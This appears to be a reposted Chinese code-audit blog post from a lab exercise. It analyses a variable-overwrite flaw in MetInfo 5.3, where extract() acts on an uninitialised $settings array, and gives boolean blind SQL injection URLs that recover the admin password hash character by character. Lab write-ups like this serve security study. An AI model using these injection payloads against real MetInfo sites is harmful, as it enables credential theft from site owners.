首页 > Web开发 > 详细

php代码审计之MetInfo5.3盲注

时间:2019-05-06 12:55:26      阅读:192      评论:0      收藏:0      [点我收藏+]

webug3.0实战扩展第一题是Metinfo img.php的盲注,

<?php
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. 
require_once ‘../include/common.inc.php‘;
$mdname = ‘img‘;
$showname = ‘showimg‘;
$dbname = $met_img;
$dbname_list = $met_img_list;
$mdmendy = 1;
$imgproduct = ‘img‘;
$class1re = ‘‘;
require_once ‘../include/global/listmod.php‘;
$img_listnow = $modlistnow;
$img_list_new  = $md_list_new;
$img_class_new = $md_class_new;
$img_list_com  = $md_list_com;
$img_class_com = $md_class_com;
$img_class     = $md_class;
$img_list      = $md_list;
require_once ‘../public/php/imghtml.inc.php‘;
include template(‘img‘);
footer();
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
echo $dbname
?>

我们可以看到可以通过$met_img覆盖$dbname变量

第四行包含了common.inc.php文件,在common.inc.php文件随后的代码里包含了一个config.inc.php的文件, 看名字就知道是一些初始化变量配置,但是config.inc.php的一个数组$settings却忘记了初始化

/*读配置数据*/
$query = "SELECT * FROM $met_config WHERE lang=‘$lang‘ or lang=‘metinfo‘";
$result = $db->query($query);
while($list_config= $db->fetch_array($result)){
    if($metinfoadminok)$list_config[‘value‘]=str_replace(‘"‘, ‘&#34;‘, str_replace("‘", ‘&#39;‘,$list_config[‘value‘]));
    $settings_arr[]=$list_config;
    if($list_config[‘columnid‘]){
        $settings[$list_config[‘name‘].‘_‘.$list_config[‘columnid‘]]=$list_config[‘value‘];
    }else{
        $settings[$list_config[‘name‘]]=$list_config[‘value‘];
    }
    if($list_config[‘flashid‘]){
        $list_config[‘value‘]=explode(‘|‘,$list_config[‘value‘]);
        $falshval[‘type‘]=$list_config[‘value‘][0];
        $falshval[‘x‘]=$list_config[‘value‘][1];
        $falshval[‘y‘]=$list_config[‘value‘][2];
        $falshval[‘imgtype‘]=$list_config[‘value‘][3];
        $met_flasharray[$list_config[‘flashid‘]]=$falshval;
    }
}
@extract($settings);

而且还使用了extract(),容易导致变量覆盖。

即http://localhost/case/?settings[met_img]=met_admin_table  or  1=1 --

include/global/listmod.php中,

$query="select * from $met_column where module=‘$search_module‘ and (classtype=1 or releclass!=0) and lang=‘$lang‘ order by no_order ASC,id ASC";

利用此sql语句,

 

基于布尔SQL盲注----------构造逻辑判断

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)-- 1

-----返回空白

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)-- 1

-----返回案例

left(a,b)从左侧截取a的前b位,substr(a,b,c)从b位置开始,截取字符串a的c长度,

很明显,这是对字符进行一个一个的判断,最好是写个python 脚本运行跑出密码,emmm,由于才疏学浅,容我研究一番。

 

php代码审计之MetInfo5.3盲注

原文:https://www.cnblogs.com/danku/p/10818853.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!